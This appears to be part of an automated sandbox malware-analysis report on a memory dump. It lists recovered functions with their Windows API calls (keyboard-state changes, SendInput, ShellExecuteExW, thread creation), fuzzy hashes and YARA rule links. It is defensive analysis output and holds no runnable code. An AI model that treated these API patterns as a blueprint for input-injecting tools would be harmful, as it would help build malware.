                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                • String ID: \*.*
                • API String ID: 2326526234-1173974218
                • Opcode ID: c42c6c007ec3ee7c98e50a35b6229bb005ee970cdbd155904bea49b2e2930710
                • Instruction ID: 496d6976fb0c1eaa59e46877b261cf081fc283c151165ee1761af1e7e7734b68
                • Opcode Fuzzy Hash: c42c6c007ec3ee7c98e50a35b6229bb005ee970cdbd155904bea49b2e2930710
                • Instruction Fuzzy Hash: E23156B19012186ACF20DFB5DC456DEB3B4EF49300F4055EEE909A7251EB399784CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043B415, Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0043B433
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0043B466
                • EnterCriticalSection.KERNEL32(?), ref: 0043B483
                • _memmove.LIBCMT ref: 0043B4E1
                • _memmove.LIBCMT ref: 0043B504
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B513
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0043B52F
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0043B544
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                • String ID:
                • API String ID: 2737351978-0
                • Opcode ID: f176d57fc453af41ff8eb6f9dc814a9e448aa3ef7a3be588fe063bc2188bc216
                • Instruction ID: f3da0131965f60451b7dff99cfdd88bc2df5199d6d39635c2bd1e5210fae78d3
                • Opcode Fuzzy Hash: f176d57fc453af41ff8eb6f9dc814a9e448aa3ef7a3be588fe063bc2188bc216
                • Instruction Fuzzy Hash: 44419C71900208EBC720DF95D941EABB7B8FF48700F00896EF55A96691D7B4EA84DB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403C9F, Relevance: 12.1, APIs: 8, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                • String ID:
                • API String ID: 73303432-0
                • Opcode ID: a58a02e1687d926579633118a0b5bbbfc873a17fcad370eb820e14a4673c1826
                • Instruction ID: 04265d800b5583b1ec66b03f65b36c7f2ca00b099875597e30f924c461a97a75
                • Opcode Fuzzy Hash: a58a02e1687d926579633118a0b5bbbfc873a17fcad370eb820e14a4673c1826
                • Instruction Fuzzy Hash: 9A110132208306ABE7107FA69C0198B3B98EF00725B10443BF804A61C2DB7C990186A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00469705, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Variant$Copy$ClearErrorLast
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 2487901850-572801152
                • Opcode ID: 4ad88ce886cea7c508ec176429c7a8607bd7c0174849c80496acc34801a8fa19
                • Instruction ID: 17a657beb97ad7668f293f19a79609bf932f547aa0c8629f8f02875e3e725b26
                • Opcode Fuzzy Hash: 4ad88ce886cea7c508ec176429c7a8607bd7c0174849c80496acc34801a8fa19
                • Instruction Fuzzy Hash: CCC19175A00209ABDF14DF94C881FEEB7B9EB44304F10855EF905AB341E7B99D84CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043045D, Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                Download Yara Rule
                APIs
                • GetSystemMetrics.USER32 ref: 0043049C
                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004306D8
                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 004306F7
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0043071A
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 0043074F
                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 00430772
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0043078C
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                • String ID:
                • API String ID: 1457242333-0
                • Opcode ID: 620d31fc2142c29c005fbc04cd8802ece7d34af068563b271464c080456c4023
                • Instruction ID: d8d011e9e9095a339b781ae8745ae4343f764f1d44e3f44ba7778dab2952d1e5
                • Opcode Fuzzy Hash: 620d31fc2142c29c005fbc04cd8802ece7d34af068563b271464c080456c4023
                • Instruction Fuzzy Hash: 8EB1BE30600609EFCB14CF68C9957BEBBF1FF88301F14961AE89497284D778AA51CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00437273, Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004370BF: DeleteObject.GDI32(00000000), ref: 004370FC
                  • Part of subcall function 004370BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043714C
                  • Part of subcall function 004370BF: BeginPath.GDI32(?), ref: 00437161
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043718A
                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004373E8
                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004373F8
                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 00437433
                • LineTo.GDI32(?,?,FFFFFFFE), ref: 0043743C
                • CloseFigure.GDI32(?), ref: 00437443
                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 00437452
                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0043746E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                • String ID:
                • API String ID: 4082120231-0
                • Opcode ID: 0327c556db419807f636e60e516d0ef44b59afa6bad43a3a75587d4e4236b1c5
                • Instruction ID: 4b6717cd3511ef90eedf5b7a08b8193158ca2ee17f77532887211d2cf048ab3f
                • Opcode Fuzzy Hash: 0327c556db419807f636e60e516d0ef44b59afa6bad43a3a75587d4e4236b1c5
                • Instruction Fuzzy Hash: B6713CB4904109EFDB14CF94C884EBEBBB9FF89310F248159E89567341D774AE41CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004344D9, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 00434518
                • GetKeyboardState.USER32(?), ref: 0043452D
                • SetKeyboardState.USER32(?), ref: 00434581
                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004345AE
                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004345CC
                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00434615
                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00434637
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: dea8f836d653b6e2ce44df3a51c7308dc1952691dce4c3059c64cfe4021b51ea
                • Instruction ID: 9faa58954598c3b10aae781f0a20ca84fde09453111cac4b399f56cb13296ad8
                • Opcode Fuzzy Hash: dea8f836d653b6e2ce44df3a51c7308dc1952691dce4c3059c64cfe4021b51ea
                • Instruction Fuzzy Hash: 4151FAA09087D139F73697688C46BF7BF945F8A304F08968BF1D5156C2C3ACB894C7A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00447BCA, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 00447BEE
                • _memset.LIBCMT ref: 00447C9A
                • ShellExecuteExW.SHELL32(0000003C), ref: 00447CDE
                  • Part of subcall function 003FF260: _wcslen.LIBCMT ref: 003FF262
                  • Part of subcall function 003FF260: _wcscpy.LIBCMT ref: 003FF282
                • CloseHandle.KERNEL32(?), ref: 00447D80
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                • String ID: <$@
                • API String ID: 1325244542-1426351568
                • Opcode ID: 5008652a99d8c1936361a3461a15092bade00907a52d47bf88199494670c8ac8
                • Instruction ID: e66f38b7fab6f2acd2f9c250e80987ee94d02d450323a9501a08090494d74ac2
                • Opcode Fuzzy Hash: 5008652a99d8c1936361a3461a15092bade00907a52d47bf88199494670c8ac8
                • Instruction Fuzzy Hash: 5E51B3B5D002099BDB10EFA5D985AAFB7F4EF04304F10842EE905AB391DB79ED46CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00439783, Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ad1918592ede32e134190f5c595f59eb1194a951ab4f29e4da74d9189ce7d29
                • Instruction ID: 0146ac09d486fe8bddb088160eafe8aa88201be52d7dd14cb58a67e62a0ee5ef
                • Opcode Fuzzy Hash: 5ad1918592ede32e134190f5c595f59eb1194a951ab4f29e4da74d9189ce7d29
                • Instruction Fuzzy Hash: 1941E831900114ABD714DF58DC84FEA7764EB8B320F24827AF959AB3D1C7B45D42CB99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00430D1F, Relevance: 10.6, APIs: 7, Instructions: 119windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00430D3F
                • GetWindowLongW.USER32(?,000000F0), ref: 00430D81
                • GetWindowLongW.USER32(?,000000F0), ref: 00430DC1
                • SendMessageW.USER32(01271B88,000000F1,00000000,00000000), ref: 00430DF5
                • SendMessageW.USER32(01271B88,000000F1,00000001,00000000), ref: 00430E21
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: cef546fac3e031dd3682c44e177cc9aaefed383d70aec4d4f6b084f6dcfef852
                • Instruction ID: 4ac20a1f9d037792d0fcb96a09dbab1810ca8111f2feda07af710e777e98c5ad
                • Opcode Fuzzy Hash: cef546fac3e031dd3682c44e177cc9aaefed383d70aec4d4f6b084f6dcfef852
                • Instruction Fuzzy Hash: 144128353402019FC620CF58DD94F2633A5EFAA710F2452BAE6159F3A2CB74BC82DB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004383D9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Menu$Item$DrawInfoInsert_memset
                • String ID: 0
                • API String ID: 3866635326-4108050209
                • Opcode ID: f976d9772eddc502820170912f383e7a04ba7f1f545d5945d14190e23160067e
                • Instruction ID: 798d23f603a4dc5b6a6855e8c40258060711f3e676c1d668e34881cf932deb90
                • Opcode Fuzzy Hash: f976d9772eddc502820170912f383e7a04ba7f1f545d5945d14190e23160067e
                • Instruction Fuzzy Hash: E8418B75A00209EFDB10CF95E884B9BB7B5FF99318F10812EF9199B390DB74A845CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF540, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                Download Yara Rule
                APIs
                • _strlen.LIBCMT ref: 003FF548
                  • Part of subcall function 003FF700: _memset.LIBCMT ref: 003FF708
                  • Part of subcall function 003FF570: _memmove.LIBCMT ref: 003FF5B9
                  • Part of subcall function 003FF570: _memmove.LIBCMT ref: 003FF5D3
                • _memset.LIBCMT ref: 003FF663
                • _memset.LIBCMT ref: 003FF66D
                • _memset.LIBCMT ref: 003FF67A
                • _sprintf.LIBCMT ref: 003FF69E
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memset$_memmove$_sprintf_strlen
                • String ID: %02X
                • API String ID: 1823384282-436463671
                • Opcode ID: 1d1a6965ca51499bc703a20b6aed3a502359e6244474118b4ab27de6859298f1
                • Instruction ID: 3bd6b683c2ab5a17b9007ecc013f63b9d195393a536db37f9163e43371aafc6b
                • Opcode Fuzzy Hash: 1d1a6965ca51499bc703a20b6aed3a502359e6244474118b4ab27de6859298f1
                • Instruction Fuzzy Hash: C021D0717401183BD711B669CC86BAAB39CEF41744F10447BFA05EB2D1EE74EA0583A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00440AF2, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00440B5D
                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00440B6E
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00440B7C
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00440B8D
                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00440B9B
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID: Msctls_Progress32
                • API String ID: 3850602802-3636473452
                • Opcode ID: d3cb6700a2646f37807d77048f5eac00074e23c6be16fa8b14dd316da03ae5dc
                • Instruction ID: 7db19cadd11f08017b3f0d77c078f945ddcd382851b290e3aae335665bedac19
                • Opcode Fuzzy Hash: d3cb6700a2646f37807d77048f5eac00074e23c6be16fa8b14dd316da03ae5dc
                • Instruction Fuzzy Hash: E621817135030476EB209EA9DC42F97B3A9AF98B24F21451AFB04AB2D0C5B4F8518A5C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426BF8, Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00426AD7: GetProcessHeap.KERNEL32(00000008,0000000C,00426C03), ref: 00426ADB
                  • Part of subcall function 00426AD7: HeapAlloc.KERNEL32(00000000), ref: 00426AE2
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00426C12
                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00426C1B
                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00426C24
                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00426C30
                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00426C39
                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426C3C
                • CreateThread.KERNEL32 ref: 00426C54
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: 33b64468719ebc5953efad7e500e2d6c566cccad8eab9c8f62f133ce5bfad407
                • Instruction ID: c1d4bbca19b1b8653c771a6b7054eac1e648f9fe75062cc48cd698b8e09bb3c4
                • Opcode Fuzzy Hash: 33b64468719ebc5953efad7e500e2d6c566cccad8eab9c8f62f133ce5bfad407
                • Instruction Fuzzy Hash: A901CD753403147BE620EB65DC86F5B775DEB89B50F514415FA04DB2D1C6B9E800CAA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004201F8, Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Rect$Client$Window$MetricsScreenSystem
                • String ID:
                • API String ID: 3220332590-0
                • Opcode ID: 2834bf11d8cdf0c2ea7341f29be6b7bd5d6c651ffc7f30250750719bf0013ec9
                • Instruction ID: 0fe1e64ed20618b606898b8c3fc04d61e427e8603e6601af892f15e3b5010e4b
                • Opcode Fuzzy Hash: 2834bf11d8cdf0c2ea7341f29be6b7bd5d6c651ffc7f30250750719bf0013ec9
                • Instruction Fuzzy Hash: BDA14574A0071A9BCB20DFA8D584BEEB7F1FF58314F00852AE9A9D3351E774AA44CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C48A, Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 0043C4E6
                • SetKeyboardState.USER32(00000080), ref: 0043C50A
                • PostMessageW.USER32(?,00000100,?,?), ref: 0043C54B
                • PostMessageW.USER32(?,00000104,?,?), ref: 0043C583
                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0043C5A5
                • SendInput.USER32(00000001,?,0000001C), ref: 0043C638
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessagePost$KeyboardState$InputSend
                • String ID:
                • API String ID: 2221674350-0
                • Opcode ID: 758031c9bab159cbebaac165d2e3f89c20e46f980ad2b24b8ccc24337f1d75fb
                • Instruction ID: 587f14a8caec30b517c433f6e4608a63373adf82790597d1716427167fd6f975
                • Opcode Fuzzy Hash: 758031c9bab159cbebaac165d2e3f89c20e46f980ad2b24b8ccc24337f1d75fb
                • Instruction Fuzzy Hash: 4A51387260012876DB10AFA9ACC5BFB7B68EBC9310F40515BFD9466242C3799951C7A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00434AE1, Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscpy$_wcscat
                • String ID:
                • API String ID: 2037614760-0
                • Opcode ID: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
                • Instruction ID: d15e5697bc7357c7eb47760b0571b294243aab80d414519d608a387a9f061f8a
                • Opcode Fuzzy Hash: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
                • Instruction Fuzzy Hash: 904127315001246ACB20EF5A94D1AFFB768DFDA314F80205FFC8287212D63DBD96C6A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00441AB8, Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00000000), ref: 00441B16
